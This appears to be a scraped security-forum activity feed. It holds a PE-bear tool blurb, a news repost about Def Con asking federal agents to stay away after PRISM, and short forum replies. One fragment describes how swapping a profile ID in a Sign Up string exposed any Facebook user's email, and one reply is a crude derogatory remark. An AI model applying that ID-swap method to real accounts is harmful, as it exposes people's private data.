Currently the project is under rapid development. You can expect new features/fixes every week. Any suggestions/bug reports are welcome. I am waiting for your e-mails and comments.

[h=2]Screenshots[/h]

Sursa: PE-bear | hasherezade's 1001 nights
-
59b63a G 5af3107aba69 G 0 G 46

He explained that in the above string, “G” acts as a delimiter/separator, and the second value, i.e. the one after the first “G” (5af3107aba69), is the user's profile ID. Replacing this user ID can expose the email address of any user on the Sign Up page. An attacker can obtain this numerical ID of a Facebook profile from the Graph API. Superb!
-
cybersmartdefence.com DOWN
justiceofddos.com DOWN
Nytro replied to codemaniac's topic in Cosul de gunoi
This is not ShowOff. -
https://rstforums.com/forum/70576-facultati-de-informatica.rst
-
I went to the trouble of writing this for nothing: https://rstforums.com/forum/70576-facultati-de-informatica.rst
-
Ultra gay.
-
[h=1]Feds asked to avoid Def Con hacking conference after PRISM scandal[/h]by Dan Worth The organisers of the US hacking conference Def Con have asked federal agents to stay away from this year's event given the revelations about the PRISM hacking scandal that broke earlier this year, generating huge levels of mistrust among the hacking community. Writing under his alias The Dark Tangent on the event’s website, organiser Jeff Moss said in the past the open nature of Def Con had been its greatest asset and a reason why the event had proved so popular. “For over two decades Def Con has been an open nexus of hacker culture, a place where seasoned pros, hackers, academics, and feds can meet, share ideas and party on neutral territory,” he wrote. “Our community operates in the spirit of openness, verified trust, and mutual respect.” However, he said that this year it would be sensible if a line was drawn and agents did not attend, as emotions would be running high about the extent of surveillance carried out by the government under the PRISM data collection scheme. “When it comes to sharing and socialising with feds, recent revelations have made many in the community uncomfortable about this relationship,” Moss added. “Therefore, I think it would be best for everyone involved if the feds call a ‘time-out’ and not attend DEF CON this year.” He added that this would give everybody “time to think about how we got here, and what comes next." Earlier this week the European Commission (EC) approved an investigation into the PRISM spying scandal, which also led to claims that government offices had been bugged in order to pry into conversations between world leaders. Sursa: Feds asked to avoid Def Con hacking conference after PRISM scandal - IT News from V3.co.uk